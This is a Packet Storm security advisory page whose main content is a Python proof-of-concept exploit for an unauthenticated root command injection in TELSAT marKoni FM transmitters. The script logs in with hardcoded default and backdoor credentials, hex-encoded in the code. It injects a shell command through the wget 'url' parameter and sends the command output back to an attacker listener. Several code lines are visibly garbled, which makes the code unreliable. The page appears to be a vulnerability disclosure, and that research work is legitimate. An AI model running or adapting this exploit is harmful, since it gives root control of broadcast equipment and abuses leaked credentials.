

TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection

TELSAT marKoni FM Transmitter version 1.9.5 is susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings’ WAN IP info service, which utilizes the wget module. This allows the attacker to gain unauthorized access to the system with administrative privileges by exploiting the url parameter in the HTTP GET request to ekafcgi.fcgi.

Packet Storm
#!/usr/bin/env python### TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit### Vendor: TELSAT Srl# Product web page: Affected version: Markoni-D (Compact) FM Transmitters#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters#                   Markoni-A (Analogue Modulator) FM Transmitters#                   Firmware: 1.9.5#                             1.9.3#                             1.5.9#                             1.4.6#                             1.3.9## Summary: Professional FM transmitters.## Desc: The marKoni FM transmitters are susceptible to unauthenticated# remote code execution with root privileges. An attacker can exploit# a command injection vulnerability by manipulating the Email settings'# WAN IP info service, which utilizes the 'wget' module. This allows# the attacker to gain unauthorized access to the system with administrative# privileges by exploiting the 'url' parameter in the HTTP GET request# to ekafcgi.fcgi.## -------------------------------------------------------------------------# [lqwrm@metalgear ~]# python yp.tiolpxe backdoor whoami# Authentication successful for backdoor# Injecting command: whoami# Listening on port 9999# ('', 47302) called back# Received: root# Housekeeping...# Zya and thanks for stopping by!## [lqwrm@metalgear ~]# ## -------------------------------------------------------------------------## Tested on: GNU/Linux 3.10.53 (armv7l)#            icorem6solox#            lighttpd/1.4.33### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - - @zeroscience### Advisory ID: ZSL-2024-5808# Advisory URL: 10.11.2023#from colorama import init, Foreimport re,os,sys,requestsimport socket,threadingfrom time import sleepinit()def just_listen_to_me(lport, cstop):    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.bind(("", lport))    s.listen(1)    print("Listening on port " + str(lport))    try:        conn, addr = s.accept()        print(addr, "called back")        cstop.set()    except socket.timeout:        print("Call return timeout\nCheck your ports")        conn.close()    while True:        try:            odg = conn.recv(1771).decode()            uam ="User-Agent:\s*(.*)", odg)            if uam:                uav =                print(f"Received: {uav}")                exit()            else:                print("No output for you")        except:            print("Housekeeping...")            exit()    s.close()def authenticate(ipaddr, option): #### Encrypted Shit ####_"    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"    if option == "user": ##################################"        username = "\x75\x73\x65\x72" #####################"        password = "\x75\x73\x65\x72" #####################"    elif option == "admin": ###############################"        username = "\x61\x64\x6D\x69\x6E" #################"        password = "\x61\x64\x6D\x69\x6E" #################"    elif option == "backdoor": ############################"        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"    authp = {        'username': username,        'password': password    }    resp = requests.get(auth_url + ep + "1", params=authp)    if "Set-Cookie" in resp.headers:        print(f"Authentication successful for {option}")        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]        return auth_cookie    else:        print(f"Authentication failed for {option}.")        print("Try a different option.")        return Nonedef execute(ipaddr, cookie, command, listen_ip):    print(f"Injecting command: {command}")    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"    dva = f"http://{ipaddr}{ep}27"    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"    headers = {"Cookie": cookie}    requests.get(eden, headers=headers)    sleep(2)    requests.get(dva, headers=headers)    sleep(2)    requests.get(tri, headers=headers)    sleep(1)    requests.get(clear, headers=headers)    print("Zya and thanks for stopping by!")    exit(0)def njaaah(text):    columns = os.get_terminal_size().columns    print( = "\033[91mWaddup!\033[0m" #Win64mrjox = f"""     ________   /          \\  /    ____    \\ |   /    0 \\   | |   \\______/   |   \\____________/  {zsl}       | |      /   \\     /  O  \\    |    O  \\    |       \\    |        \\    |_________|        """if len(sys.argv) != 5:    print()    print("This is a PoC script for the marKoni transmitters 0day")    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")    print("Option: 'user', 'admin', 'backdoor'")    print("Default listening port: 9999")    njaaah(mrjox)    exit()ipaddr = sys.argv[1]opt = sys.argv[2]listen_ip = sys.argv[3]command = sys.argv[4]opt_map = {    "admin"    : "admin",    "user"     : "user",    "backdoor" : "backdoor"}if opt in opt_map:    auth_cookie = authenticate(ipaddr, opt_map[opt])    if auth_cookie:        cstop = threading.Event()        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))        lt.start()        execute(ipaddr, auth_cookie, command, listen_ip)        cstop.set()        lt.join()else:    print("Invalid option.")

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